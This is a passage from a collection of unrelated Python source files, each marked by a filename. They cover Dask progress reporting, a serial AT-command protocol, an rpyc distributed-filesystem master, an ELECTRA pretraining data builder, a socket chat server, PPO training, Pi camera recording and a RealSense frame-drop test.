is reported.
"""
def __init__(self,
label: str,
total_work: float,
interval: float = 0.1,
initial_interval: float = 0):
super().__init__()
assert_given(label, 'label')
assert_true(total_work > 0, 'total_work must be greater than zero')
self._label = label
self._total_work = total_work
self._state: Optional[ProgressState] = None
self._initial_interval = initial_interval
self._interval = interval
self._last_worked = 0
self._running = False
def __enter__(self) -> 'observe_dask_progress':
super().__enter__()
self._state = _ProgressContext.instance().begin(self._label,
self._total_work)
return self
def __exit__(self, type, value, traceback):
self._stop_thread()
_ProgressContext.instance().end(type, value, traceback)
super().__exit__(type, value, traceback)
# noinspection PyUnusedLocal
def _start(self, dsk):
"""Dask callback implementation."""
self._dask_state = None
self._start_time = time.perf_counter()
# Start background thread
self._running = True
self._timer = threading.Thread(target=self._timer_func)
self._timer.daemon = True
self._timer.start()
# noinspection PyUnusedLocal
def _pretask(self, key, dsk, state):
"""Dask callback implementation."""
self._dask_state = state
# noinspection PyUnusedLocal
def _posttask(self, key, result, dsk, state, worker_id):
"""Dask callback implementation."""
self._update()
# noinspection PyUnusedLocal
def _finish(self, dsk, state, errored):
"""Dask callback implementation."""
self._stop_thread()
elapsed = time.perf_counter() - self._start_time
if elapsed > self._initial_interval:
self._update()
def _timer_func(self):
"""Background thread for updating"""
while self._running:
elapsed = time.perf_counter() - self._start_time
if elapsed > self._initial_interval:
self._update()
time.sleep(self._interval)
def _update(self):
dask_state = self._dask_state
if not dask_state:
return
num_done = len(dask_state['finished'])
num_tasks = num_done + sum(len(dask_state[k])
for k in ['ready', 'waiting', 'running'])
if num_done < num_tasks:
work_fraction = num_done / num_tasks if num_tasks > 0 else 0
worked = work_fraction * self._total_work
work = worked - self._last_worked
if work > 0:
_ProgressContext.instance().worked(work)
self._last_worked = worked
def _stop_thread(self):
if self._running:
self._running = False
self._timer.join()
|
at_protocol.py
|
#! /usr/bin/env python
# encoding: utf-8
"""
Example of a AT command protocol.
https://en.wikipedia.org/wiki/Hayes_command_set
http://www.itu.int/rec/T-REC-V.250-200307-I/en
"""
from __future__ import print_function
import sys
sys.path.insert(0, '..')
import logging
import serial
import serial.threaded
import threading
try:
import queue
except ImportError:
import Queue as queue
class ATException(Exception):
pass
class ATProtocol(serial.threaded.LineReader):
TERMINATOR = b'\r\n'
def __init__(self):
super(ATProtocol, self).__init__()
self.alive = True
self.responses = queue.Queue()
self.events = queue.Queue()
self._event_thread = threading.Thread(target=self._run_event)
self._event_thread.daemon = True
self._event_thread.name = 'at-event'
self._event_thread.start()
self.lock = threading.Lock()
def stop(self):
"""
Stop the event processing thread, abort pending commands, if any.
"""
self.alive = False
self.events.put(None)
self.responses.put('<exit>')
def _run_event(self):
"""
Process events in a separate thread so that input thread is not
blocked.
"""
while self.alive:
try:
self.handle_event(self.events.get())
except:
logging.exception('_run_event')
def handle_line(self, line):
"""
Handle input from serial port, check for events.
"""
if line.startswith('+'):
self.events.put(line)
else:
self.responses.put(line)
def handle_event(self, event):
"""
Spontaneous message received.
"""
print('event received:', event)
def command(self, command, response='OK', timeout=5):
"""
Set an AT command and wait for the response.
"""
with self.lock: # ensure that just one thread is sending commands at once
self.write_line(command)
lines = []
while True:
try:
line = self.responses.get(timeout=timeout)
#~ print("%s -> %r" % (command, line))
if line == response:
return lines
else:
lines.append(line)
except queue.Empty:
raise ATException('AT command timeout (%r)' % (command,))
# test
if __name__ == '__main__':
import time
class PAN1322(ATProtocol):
"""
Example communication with PAN1322 BT module.
Some commands do not respond with OK but with a '+...' line. This is
implemented via command_with_event_response and handle_event, because
'+...' lines are also used for real events.
"""
def __init__(self):
super(PAN1322, self).__init__()
self.event_responses = queue.Queue()
self._awaiting_response_for = None
def connection_made(self, transport):
super(PAN1322, self).connection_made(transport)
# our adapter enables the module with RTS=low
self.transport.serial.rts = False
time.sleep(0.3)
self.transport.serial.reset_input_buffer()
def handle_event(self, event):
"""Handle events and command responses starting with '+...'"""
if event.startswith('+RRBDRES') and self._awaiting_response_for.startswith('AT+JRBD'):
rev = event[9:9 + 12]
mac = ':'.join('%02X' % ord(x) for x in rev.decode('hex')[::-1])
self.event_responses.put(mac)
else:
logging.warning('unhandled event: %r' % event)
def command_with_event_response(self, command):
"""Send a command that responds with '+...' line"""
with self.lock: # ensure that just one thread is sending commands at once
self._awaiting_response_for = command
self.transport.write(b'%s\r\n' % (command.encode(self.ENCODING, self.UNICODE_HANDLING),))
response = self.event_responses.get()
self._awaiting_response_for = None
return response
# - - - example commands
def reset(self):
self.command("AT+JRES", response='ROK') # SW-Reset BT module
def get_mac_address(self):
# requests hardware / calibration info as event
return self.command_with_event_response("AT+JRBD")
ser = serial.serial_for_url('spy://COM1', baudrate=115200, timeout=1)
#~ ser = serial.Serial('COM1', baudrate=115200, timeout=1)
with serial.threaded.ReaderThread(ser, PAN1322) as bt_module:
bt_module.reset()
print("reset OK")
print("MAC address is", bt_module.get_mac_address())
|
test_cli.py
|
from threading import Thread
from _thread import interrupt_main
import pytest
import time
from flashcrashed.cli import main, performance
def test_main(patched_bitfinex):
trader, notifier = patched_bitfinex
def wait_sell():
while len(trader.calls) < 2:
time.sleep(0.01)
interrupt_main()
Thread(target=wait_sell).start()
with pytest.raises(SystemExit):
main(['key', 'secret'])
assert trader.calls == [('BUY', 1), ('SELL', 1)]
assert notifier.calls[0][1]['body'].startswith('BTCUSD was BOUGHT'), \
"Incorrect notification message"
assert notifier.calls[1][1]['body'].startswith('BTCUSD was SOLD'), \
"Incorrect notification message"
def test_performance():
with pytest.raises(SystemExit):
performance([])
|
master.py
|
import logging
import math
import os
import pickle
import random
import signal
import sys
import uuid
from time import sleep
from threading import Thread
import rpyc
from rpyc.utils.server import ThreadedServer
from utils import LOG_DIR
from conf import block_size, replication_factor, minions_conf
MASTER_PORT = 2131
# Issue: State related functions may not work correctly after the Master
# definition changed.
def get_state():
return {'file_table': MasterService.exposed_Master.file_table, \
'block_mapping': MasterService.exposed_Master.block_mapping}
def set_state(state):
MasterService.exposed_Master.file_table = state['file_table']
MasterService.exposed_Master.block_mapping = state['block_mapping']
def int_handler(sig, frame):
pickle.dump(get_state(), open('fs.img', 'wb'))
sys.exit(0)
def set_conf():
# load and use conf file, restore from dump if possible.
master = MasterService.exposed_Master
master.block_size = block_size
master.replication_factor = replication_factor
for mid, loc in minions_conf.items():
host, port = loc.split(":")
master.minions[mid] = (host, port)
master.minion_content[mid] = []
assert len(minions_conf) >= master.replication_factor,\
'not enough minions to hold {} replications'.format(\
master.replication_factor)
# if found saved image of master, restore master state.
if os.path.isfile('fs.img'):
set_state(pickle.load(open('fs.img', 'rb')))
logging.info("Current Config:")
logging.info("Block size: %d, replication_faction: %d, minions: %s",
master.block_size, master.replication_factor,
str(master.minions))
class MasterService(rpyc.Service):
class exposed_Master(object):
# Map file_name to block_ids
# {"file_name": [bid1, bid2, bid3]
file_table = {}
# Map block_id to where it's saved
# {"bid": [mid1, mid2, mid3]}
block_mapping = {}
# Map mid to what's saved on it
# {"mid": [bid1, bid2, bid3]}
minion_content = {}
# Register the information of every minion
# TODO: Merge 'minions' and 'minion_content'
minions = {}
block_size = 0
replication_factor = 0
health_monitoring = 0
def exposed_read(self, fname):
if fname in self.__class__.file_table:
return [(block_id, self.__class__.block_mapping[block_id])
for block_id in self.__class__.file_table[fname]]
return None
def exposed_delete(self, fname):
for block_id in self.__class__.file_table[fname]:
for mid in self.__class__.block_mapping[block_id]:
self.__class__.minion_content[mid].remove(block_id)
del self.__class__.block_mapping[block_id]
del self.__class__.file_table[fname]
def exposed_write(self, dest, size):
if self.exists(dest):
self.wipe(dest)
self.exposed_delete(dest)
self.__class__.file_table[dest] = []
num_blocks = self.calc_num_blocks(size)
blocks = self.alloc_blocks(dest, num_blocks)
return blocks
def exposed_get_block_size(self):
return self.__class__.block_size
def exposed_get_minions(self):
return self.__class__.minions
def exposed_replicate(self, mid):
for block_id in self.__class__.minion_content[mid]:
locations = self.__class__.block_mapping[block_id]
# TODO: Change locations to double linked list
source_mid = random.choice([x for x in locations if x != mid])
target_mid = random.choice([x for x in self.__class__.minions if
x not in locations])
# Replicate block from source to target
self.replicate_block(block_id, source_mid, target_mid)
# Update information registered on Master
self.__class__.block_mapping[block_id].append(target_mid)
self.__class__.minion_content[target_mid].append(block_id)
def exposed_health_report(self):
if not self.__class__.health_monitoring:
Thread(target=self.health_monitor).start()
self.__class__.health_monitoring = 1
return self.health_check()
###############################################################################
# Private functions
###############################################################################
def alloc_blocks(self, dest, num):
blocks = []
for _ in range(num):
block_uuid = uuid.uuid1()
# TODO: Assigning algorithm.
nodes_ids = random.sample(self.__class__.minions.keys(),
self.__class__.replication_factor)
self.__class__.block_mapping[block_uuid] = nodes_ids
for mid in nodes_ids:
self.__class__.minion_content[mid].append(block_uuid)
blocks.append((block_uuid, nodes_ids))
self.__class__.file_table[dest].append(block_uuid)
return blocks
def calc_num_blocks(self, size):
return int(math.ceil(float(size)/self.__class__.block_size))
def minion_lost_handler(self, status):
# TODO
logging.info('1 or more minion dead, status: %s', format(status))
def health_monitor(self):
# actively reach out to minions forever
# SIDE EFFECT: calls minion_lost_handler when
while 1:
minions_status = self.health_check()
if not all(minions_status.values()):
self.minion_lost_handler(minions_status)
sleep(.1)
def health_check(self):
# reach out to known minions on file
# RETURN {minion -> [10]}
res = {}
for m, (host, port) in self.__class__.minions.items():
try:
con = rpyc.connect(host, port=port)
minion = con.root.Minion()
res[m] = 1 if minion.ping() == 'pong' else 0
except ConnectionRefusedError:
res[m] = 0
return res
def exists(self, f):
return f in self.__class__.file_table
def replicate_block(self, block_id, source, target):
source_host, source_port = self.__class__.minions[source]
target_host, target_port = self.__class__.minions[target]
con = rpyc.connect(source_host, port=source_port)
minion = con.root.Minion()
minion.replicate(block_id, target_host, target_port)
def wipe(self, fname):
for block_uuid in self.__class__.file_table[fname]:
node_ids = self.__class__.block_mapping[block_uuid]
for m in [self.exposed_get_minions()[_] for _ in node_ids]:
host, port = m
con = rpyc.connect(host, port=port)
minion = con.root.Minion()
minion.delete(block_uuid)
return
if __name__ == "__main__":
logging.basicConfig(filename=os.path.join(LOG_DIR, 'master'),
format='%(asctime)s--%(levelname)s:%(message)s',
datefmt='%m/%d/%Y %I:%M:%S %p',
level=logging.DEBUG)
set_conf()
signal.signal(signal.SIGINT, int_handler)
t = ThreadedServer(MasterService, port=2131)
t.start()
|
build_pretraining_dataset.py
|
# coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Writes out text data as tfrecords that ELECTRA can be pre-trained on."""
import argparse
import multiprocessing
import os
import random
import time
import tensorflow.compat.v1 as tf
from model import tokenization
from util import utils
def create_int_feature(values):
feature = tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))
return feature
class ExampleBuilder(object):
"""Given a stream of input text, creates pretraining examples."""
def __init__(self, tokenizer, max_length):
self._tokenizer = tokenizer
self._current_sentences = []
self._current_length = 0
self._max_length = max_length
self._target_length = max_length
def add_line(self, line):
"""Adds a line of text to the current example being built."""
line = line.strip().replace("\n", " ")
if (not line) and self._current_length != 0: # empty lines separate docs
return self._create_example()
bert_tokens = self._tokenizer.tokenize(line)
bert_tokids = self._tokenizer.convert_tokens_to_ids(bert_tokens)
self._current_sentences.append(bert_tokids)
self._current_length += len(bert_tokids)
if self._current_length >= self._target_length: # If cur_len is longer than max_len
return self._create_example()
return None
def _create_example(self):
"""Creates a pre-training example from the current list of sentences."""
# small chance to only have one segment as in classification tasks
if random.random() < 0.1:
first_segment_target_length = 100000
else:
# -3 due to not yet having [CLS]/[SEP] tokens in the input text
first_segment_target_length = (self._target_length - 3) // 2
first_segment = []
second_segment = []
for sentence in self._current_sentences:
# the sentence goes to the first segment if (1) the first segment is
# empty, (2) the sentence doesn't put the first segment over length or
# (3) 50% of the time when it does put the first segment over length
if (len(first_segment) == 0 or
len(first_segment) + len(sentence) < first_segment_target_length or
(len(second_segment) == 0 and
len(first_segment) < first_segment_target_length and
random.random() < 0.5)):
first_segment += sentence
else:
second_segment += sentence
# trim to max_length while accounting for not-yet-added [CLS]/[SEP] tokens
first_segment = first_segment[:self._max_length - 2]
second_segment = second_segment[:max(0, self._max_length -
len(first_segment) - 3)]
# prepare to start building the next example
self._current_sentences = []
self._current_length = 0
# small chance for random-length instead of max_length-length example
if random.random() < 0.05:
self._target_length = random.randint(5, self._max_length)
else:
self._target_length = self._max_length
return self._make_tf_example(first_segment, second_segment)
def _make_tf_example(self, first_segment, second_segment):
"""Converts two "segments" of text into a tf.train.Example."""
vocab = self._tokenizer.vocab
input_ids = [vocab["[CLS]"]] + first_segment + [vocab["[SEP]"]]
segment_ids = [0] * len(input_ids)
if second_segment:
input_ids += second_segment + [vocab["[SEP]"]]
segment_ids += [1] * (len(second_segment) + 1)
input_mask = [1] * len(input_ids)
input_ids += [0] * (self._max_length - len(input_ids))
input_mask += [0] * (self._max_length - len(input_mask))
segment_ids += [0] * (self._max_length - len(segment_ids))
tf_example = tf.train.Example(features=tf.train.Features(feature={
"input_ids": create_int_feature(input_ids),
"input_mask": create_int_feature(input_mask),
"segment_ids": create_int_feature(segment_ids)
}))
return tf_example
class ExampleWriter(object):
"""Writes pre-training examples to disk."""
def __init__(self, job_id, vocab_file, output_dir, max_seq_length,
num_jobs, blanks_separate_docs, do_lower_case,
num_out_files=1000):
self._blanks_separate_docs = blanks_separate_docs
tokenizer = tokenization.KoCharElectraTokenizer(
vocab_file=vocab_file,
do_lower_case=do_lower_case)
self._example_builder = ExampleBuilder(tokenizer, max_seq_length)
self._writers = []
for i in range(num_out_files):
if i % num_jobs == job_id:
output_fname = os.path.join(
output_dir, "pretrain_data.tfrecord-{:}-of-{:}".format(
i, num_out_files))
self._writers.append(tf.io.TFRecordWriter(output_fname))
self.n_written = 0
def write_examples(self, input_file):
"""Writes out examples from the provided input file."""
with tf.io.gfile.GFile(input_file) as f:
for line in f:
# line = line.strip()
if line or self._blanks_separate_docs:
example = self._example_builder.add_line(line)
if example:
self._writers[self.n_written % len(self._writers)].write(
example.SerializeToString())
self.n_written += 1
example = self._example_builder.add_line("")
if example:
self._writers[self.n_written % len(self._writers)].write(
example.SerializeToString())
self.n_written += 1
def finish(self):
for writer in self._writers:
writer.close()
def write_examples(job_id, args):
"""A single process creating and writing out pre-processed examples."""
def log(*args):
msg = " ".join(map(str, args))
print("Job {}:".format(job_id), msg)
log("Creating example writer")
example_writer = ExampleWriter(
job_id=job_id,
vocab_file=args.vocab_file,
output_dir=args.output_dir,
max_seq_length=args.max_seq_length,
num_jobs=args.num_processes,
blanks_separate_docs=args.blanks_separate_docs,
do_lower_case=args.do_lower_case
)
log("Writing tf examples")
fnames = sorted(tf.io.gfile.listdir(args.corpus_dir))
fnames = [f for (i, f) in enumerate(fnames)
if i % args.num_processes == job_id]
random.shuffle(fnames)
start_time = time.time()
for file_no, fname in enumerate(fnames):
if file_no > 0:
elapsed = time.time() - start_time
log("processed {:}/{:} files ({:.1f}%), ELAPSED: {:}s, ETA: {:}s, "
"{:} examples written".format(
file_no, len(fnames), 100.0 * file_no / len(fnames), int(elapsed),
int((len(fnames) - file_no) / (file_no / elapsed)),
example_writer.n_written))
example_writer.write_examples(os.path.join(args.corpus_dir, fname))
example_writer.finish()
log("Done!")
def main():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("--corpus-dir", default='../data',
help="Location of pre-training text files.")
parser.add_argument("--vocab-file", default='vocab.txt',
help="Location of vocabulary file.")
parser.add_argument("--output-dir", default='tfrecord_data',
help="Where to write out the tfrecords.")
parser.add_argument("--max-seq-length", default=512, type=int,
help="Number of tokens per example.")
parser.add_argument("--num-processes", default=1, type=int,
help="Parallelize across multiple processes.")
parser.add_argument("--blanks-separate-docs", default=False, type=bool,
help="Whether blank lines indicate document boundaries.")
parser.add_argument("--do-lower-case", dest='do_lower_case',
action='store_true', help="Lower case input text.")
parser.add_argument("--no-lower-case", dest='do_lower_case',
action='store_false', help="Don't lower case input text.")
parser.set_defaults(do_lower_case=False)
args = parser.parse_args()
print(args)
utils.rmkdir(args.output_dir)
if args.num_processes == 1:
write_examples(0, args)
else:
jobs = []
for i in range(args.num_processes):
job = multiprocessing.Process(target=write_examples, args=(i, args))
jobs.append(job)
job.start()
for job in jobs:
job.join()
if __name__ == "__main__":
main()
|
chatServer.py
|
#!/usr/bin/env python3
"""Server for multithreaded (asynchronous) chat application."""
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread
def accept_incoming_connections():
"""Sets up handling for incoming clients."""
while True:
client, client_address = SERVER.accept()
print("%s:%s has connected." % client_address)
client.send(bytes("Greetings from the cave! Now type your name and press enter!", "utf8"))
addresses[client] = client_address
Thread(target=handle_client, args=(client,)).start()
def handle_client(client): # Takes client socket as argument.
"""Handles a single client connection."""
name = client.recv(BUFSIZ).decode("utf8")
welcome = 'Welcome %s! If you ever want to quit, type {quit} to exit.' % name
client.send(bytes(welcome, "utf8"))
msg = "%s has joined the chat!" % name
broadcast(bytes(msg, "utf8"))
clients[client] = name
while True:
msg = client.recv(BUFSIZ)
if msg != bytes("{quit}", "utf8"):
broadcast(msg, name+": ")
else:
client.send(bytes("{quit}", "utf8"))
client.close()
del clients[client]
broadcast(bytes("%s has left the chat." % name, "utf8"))
break
def broadcast(msg, prefix=""): # prefix is for name identification.
"""Broadcasts a message to all the clients."""
for sock in clients:
sock.send(bytes(prefix, "utf8")+msg)
clients = {}
addresses = {}
HOST = ''
PORT = 33000
BUFSIZ = 1000000
ADDR = (HOST, PORT)
SERVER = socket(AF_INET, SOCK_STREAM)
SERVER.bind(ADDR)
if __name__ == "__main__":
SERVER.listen(5)
print("Waiting for connection...")
ACCEPT_THREAD = Thread(target=accept_incoming_connections)
ACCEPT_THREAD.start()
ACCEPT_THREAD.join()
SERVER.close()
|
train_policy.py
|
from functools import partial
from typing import Sequence
import os, time, multiprocessing
import torch
from rl import utils
from models.ppo import MultiAgentPPO
from models.networks import ExpertNetwork
from env.scenarios import *
from models.agent import DLAgent
from models.env import Env
import config
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--expert", type=str, default=None)
parser.add_argument("--log_dir", type=str, default=None)
parser.add_argument("--device", type=str, default=None)
parser.add_argument("--rank", type=int, default=None)
parser.add_argument("--master_addr", type=str, default="127.0.0.1")
parser.add_argument("--master_port", type=str, default="29501")
parser.add_argument("--workers", type=int, default=1)
settings = parser.parse_args()
def env_wrapper(expert=None, evaluate=False):
agent_wrapper = partial(DLAgent,
preferred_speed=config.PREFERRED_SPEED, max_speed=config.MAX_SPEED,
radius=config.AGENT_RADIUS, observe_radius=config.NEIGHBORHOOD_RADIUS,
expert=expert
)
if evaluate:
scenario = CircleCrossingScenario(n_agents=20, agent_wrapper=agent_wrapper, min_distance=0.3, radius=4)
else:
kwargs = dict(n_agents=(6, 20), agent_wrapper=agent_wrapper, min_distance=0.3)
scenario = CompositeScenarios([
CircleCrossingScenario(radius=(4, 6), noise=0.5, **kwargs),
SquareCrossingScenario(width=(8, 12), height=(8, 12), vertical=True, horizontal=True, **kwargs),
SquareCrossingScenario(width=(8, 12), height=(8, 12), vertical=True, horizontal=False, **kwargs),
SquareCrossingScenario(width=(8, 12), height=(8, 12), vertical=False, horizontal=True, **kwargs)
])
env = Env(scenario=scenario, fps=1/config.STEP_TIME, timeout=config.TIMEOUT, frame_skip=config.FRAME_SKIP)
return env
def agent_wrapper(env, rank, hooks=[]):
is_chief = rank == 0
is_evaluator = rank < 0
ckpt = os.path.join(settings.log_dir, "ckpt") if settings.log_dir else None
log_dir = settings.log_dir if is_chief or is_evaluator else None
agent = MultiAgentPPO(
actor_learning_rate=config.ACTOR_LR,
critic_learning_rate=config.CRITIC_LR,
entropy_loss_coef=config.ENTROPY_LOSS_COEF,
clip_grad_norm=config.GRAD_NORM_CLIP,
gamma=config.DISCOUNT_FACTOR,
opt_epoch=config.OPT_EPOCHS,
horizon=config.HORIZON,
batch_size=config.BATCH_SIZE,
max_samples=config.MAX_SAMPLES,
init_action_std=config.INIT_ACTION_STD,
checkpoint_file=ckpt,
log_dir=log_dir,
device=settings.device,
is_chief=is_chief,
hooks=[h() for h in hooks]
)
agent.rank = rank
return agent
def train(seed, rank, hooks=[]):
utils.seed(seed)
agent = agent_wrapper(None, rank, hooks)
agent.init()
expert = ExpertNetwork(agent_dim=4, neighbor_dim=4, out_dim=2)
if os.path.isdir(settings.expert):
expert_ckpt = os.path.join(settings.expert, "ckpt")
else:
expert_ckpt = settings.expert
ckpt = torch.load(expert_ckpt, map_location="cpu")
expert.load_state_dict(ckpt["model"])
expert.to(agent.device)
env = env_wrapper(expert)
env.seed(seed)
agent.eval()
done = True
if settings.workers > 0:
print("Worker {} starts work.".format(rank))
while not agent.requests_quit:
if done:
s = env.reset()
else:
s = s_
a, *args = agent.act(s, True)
act = [ag.act(ac, env) for ag, ac in zip(env.agents, a)]
s_, r, done, info = env.step(act)
agent.store(s, a, r, s_, done, info, *args)
if agent.needs_update():
agent.train()
agent.update()
agent.eval()
def evaluate(
seed: int = None,
trials: int = 10,
child_processes: Sequence[multiprocessing.context.Process] = None,
timeout: int = 3600,
keep_best_checkpoint: bool = True
):
env = env_wrapper(evaluate=True)
agent = agent_wrapper(env, rank=-1)
agent.init()
agent.eval()
done = True
tries = -1
best_reward = -999999
finished, global_step = False, -1
total, lifetime, arrived, collided = 0, 0, 0, 0
avg_reward, speed = [], []
while True:
if tries < 0:
last_response_time = time.time()
ckpt = None
while not finished:
if os.path.exists(agent.checkpoint_file):
try:
ckpt = torch.load(agent.checkpoint_file, map_location=agent.device)
except Exception as e:
print("Evaluator Error: ", e)
if ckpt:
agent.load_state_dict(ckpt)
step = agent.global_step.item()
if step <= global_step:
ckpt = None
else:
global_step = step
break
finished = False
if child_processes:
finished = not all(p.is_alive() for p in child_processes)
if not finished and timeout and timeout > 0:
finished = time.time() - last_response_time > timeout
if not finished: time.sleep(30)
if finished: break
tries = 0
utils.env_seed(env, seed)
if done:
s = env.reset()
reward = [[] for _ in range(len(env.agents))]
else:
s = s_
a = agent.act(s, False)[0]
act = [ag.act(ac, env) for ag, ac in zip(env.agents, a)]
s_, rews, done, info = env.step(act)
for idx, (_, r, ag) in enumerate(zip(s, rews, env.agents)):
if _ is not None:
reward[idx].append(r)
speed.append((ag.velocity.x**2 + ag.velocity.y**2)**0.5)
lifetime += 1
tries += done
if done:
arrived += len(info["arrived_agents"])
collided += len(info["collided_agents"])
total += len(env.agents)
rews = []
for r in reward:
rews.append(r[-1])
for _ in reversed(r[:-1]):
rews.append(_ + agent.gamma*rews[-1])
avg_reward.append(sum(rews)/len(rews))
if tries >= trials:
success_rate = arrived/total
collision_rate = collided/total
avg_time = lifetime/total
avg_speed = sum(speed)/len(speed)
avg_reward = sum(avg_reward)/len(avg_reward)
samples = agent.samples.item()
if agent.logger:
agent.logger.add_scalar("eval/success_rate", success_rate, global_step)
agent.logger.add_scalar("eval/collision_rate", collision_rate, global_step)
agent.logger.add_scalar("eval/avg_time", avg_time, global_step)
agent.logger.add_scalar("eval/avg_speed", avg_speed, global_step)
agent.logger.add_scalar("eval/avg_reward", avg_reward, global_step)
agent.logger.add_scalar("model/samples", agent.samples.item(), global_step)
std = agent.actor.log_std.exp().cpu().tolist()
agent.logger.add_scalar("model/std_x", std[0], global_step)
agent.logger.add_scalar("model/std_y", std[1], global_step)
print("[PERFORM] Step: {:.0f}, Collision: {:.2f}, Success: {:.2f}, Reward: {:.2f}, Samples: {:.0f}, {}".format(
global_step, collision_rate, success_rate, avg_reward,
samples, time.strftime("%m-%d %H:%M:%S")
))
total, lifetime, arrived, collided = 0, 0, 0, 0
avg_reward, speed = [], []
tries = -1
cache_id = int(samples) // int(5e6)
if cache_id:
cache_file = agent.checkpoint_file+"-{}".format(cache_id)
if not os.path.exists(cache_file):
torch.save(ckpt, cache_file)
if __name__ == "__main__":
if settings.workers > 1:
assert(settings.workers > 1 and settings.rank is not None)
from rl.distributed import distributed, DistributedSyncHook
if settings.rank == 0:
processes = []
torch.multiprocessing.set_start_method("spawn", force=True)
p = torch.multiprocessing.Process(target=distributed, args=(
partial(train, seed=1, rank=0, hooks=[DistributedSyncHook]),
"gloo", settings.rank, settings.workers
), kwargs=dict(master_addr=settings.master_addr, master_port=settings.master_port))
p.start()
processes.append(p)
evaluate(seed=1+settings.workers, child_processes=processes)
else:
distributed(
partial(train, seed=1+settings.rank, rank=settings.rank, hooks=[DistributedSyncHook]),
"gloo", settings.rank, settings.workers,
master_addr=settings.master_addr, master_port=settings.master_port
)
else:
processes = []
torch.multiprocessing.set_start_method("spawn", force=True)
p = torch.multiprocessing.Process(target=train, kwargs=dict(seed=1, rank=0))
p.start()
processes.append(p)
evaluate(seed=1+settings.workers, child_processes=processes)
|
prototype-picamera.py
|
import picamera
import cv2
import numpy as np
import datetime
import threading
import queue
def read_kbd_input(inputQueue):
print('Press q to quit:')
while (True):
# Receive keyboard input from user.
input_str = input()
# Enqueue this input string.
# Note: Lock not required here since we are only calling a single Queue method, not a sequence of them
# which would otherwise need to be treated as one atomic operation.
inputQueue.put(input_str)
def main():
camera = picamera.PiCamera()
# Optional resolutions: 1920x1080, 1280x720, 640x480
camera.resolution = (1280, 720)
# Get current datetime and compose output video file name.
dt = datetime.datetime.now()
output_file = f"{dt.year}-{dt.month}-{dt.day}_{dt.hour}h{dt.minute}m{dt.second}s.h264"
# Keyboard input queue to pass data from the thread reading the keyboard inputs to the main thread.
inputQueue = queue.Queue()
# Create & start a thread to read keyboard inputs.
# Set daemon to True to auto-kill this thread when all other non-daemonic threads are exited. This is desired since
# this thread has no cleanup to do, which would otherwise require a more graceful approach to clean up then exit.
inputThread = threading.Thread(target=read_kbd_input, args=(inputQueue,), daemon=True)
inputThread.start()
camera.start_recording(output_file)
terminated = False # Sets initial condition on while loop
while not terminated:
# if the keyboard input has been entered, check input
if inputQueue.qsize() > 0:
input_str = inputQueue.get()
# If user entered a q, quit the program
if input_str == "q":
terminated = True
camera.stop_recording()
print("Finished recording")
if __name__ == "__main__":
main()
|
test-D455_frame_drops.py
|
# License: Apache 2.0. See LICENSE file in root directory.
# Copyright(c) 2021 Intel Corporation. All Rights Reserved.
#test:device D455
#test:donotrun
import time
import threading
from queue import Queue
from rspy import test
import pyrealsense2 as rs
# Run RGB stream in D455 with 90 fps and find frame drops by checking HW timestamp of each frame
if __name__ == '__main__':
ctx = rs.context()
device = ctx.query_devices()[0]
product_line = device.get_info(rs.camera_info.product_line)
sn = device.get_info(rs.camera_info.serial_number)
fw = device.get_info(rs.camera_info.firmware_version)
print ('found device {}, fw {}'.format(sn, fw))
sensors = device.query_sensors()
depth_ir_sensor = next(s for s in sensors if s.get_info(rs.camera_info.name) == 'Stereo Module')
rgb_sensor = next(s for s in sensors if s.get_info(rs.camera_info.name) == 'RGB Camera')
rgb_profiles = rgb_sensor.profiles
rgb_profile = next(p for p in
rgb_profiles if p.fps() == 90
and p.stream_type() == rs.stream.color
and p.format() == rs.format.yuyv
and ((p.as_video_stream_profile().width() == 424 and p.as_video_stream_profile().height() == 240)
or (p.as_video_stream_profile().width() == 480 and p.as_video_stream_profile().height() == 270)
or (p.as_video_stream_profile().width() == 640 and p.as_video_stream_profile().height() == 360) )
)
class Test:
def __init__(self, rgb_sensor):
self._stop = False
self.frames = []
self.count_drops = 0
self.frame_drops_info = {}
self.prev_hw_timestamp = 0.0
self.prev_fnum = 0
self.first_frame = True
self.lrs_queue = rs.frame_queue(capacity=100000, keep_frames=True)
self.post_process_queue = Queue(maxsize=1000000)
self.rgb_sensor = rgb_sensor
def start_rgb_sensor(self):
self.rgb_sensor.start(self.lrs_queue)
def stop(self):
self._stop = True
def produce_frames(self, timeout=1):
while not self._stop:
try:
lrs_frame = self.lrs_queue.wait_for_frame(timeout_ms=timeout * 1000)
except Exception as e:
print
str(e)
continue
self.post_process_queue.put(lrs_frame, block=True, timeout=timeout)
def consume_frames(self):
while not self._stop:
element = self.post_process_queue.get(block=True)
lrs_frame = element
self.my_process(lrs_frame)
del lrs_frame
self.post_process_queue.task_done()
def my_process(self, f):
if not f:
return
delta_tolerance_percent = 95.
ideal_delta = round(1000000.0 / 90, 2)
delta_tolerance_in_us = ideal_delta * delta_tolerance_percent / 100.0
if self.first_frame:
self.prev_hw_timestamp = f.get_frame_metadata(rs.frame_metadata_value.frame_timestamp)
self.prev_fnum = f.get_frame_number()
self.first_frame = False
return
curr_hw_timestamp = f.get_frame_metadata(rs.frame_metadata_value.frame_timestamp)
delta = curr_hw_timestamp - self.prev_hw_timestamp
fnum = f.get_frame_number()
if delta > ideal_delta + delta_tolerance_in_us:
self.count_drops += 1
self.frame_drops_info[fnum] = fnum - self.prev_fnum
self.prev_hw_timestamp = curr_hw_timestamp
self.prev_fnum = fnum
#print("* frame drops = ", self.count_drops)
def analysis(self):
print ("Number of frame drops is {}".format(self.count_drops))
for k, v in self.frame_drops_info:
print("Number of dropped frame before frame ", k, ", is :", v)
test.check(self.count_drops == 0)
test.finish()
test.start("Testing D455 frame drops on " + product_line + " device ")
for ii in range(60):
print("================ Iteration {} ================".format(ii))
test = Test(rgb_sensor)
rgb_sensor.set_option(rs.option.global_time_enabled, 0)
rgb_sensor.open([rgb_profile])
producer_thread = threading.Thread(target=test.produce_frames, name="producer_thread")
producer_thread.start()
consumer_thread = threading.Thread(target=test.consume_frames, name="consumer_thread")
consumer_thread.start()
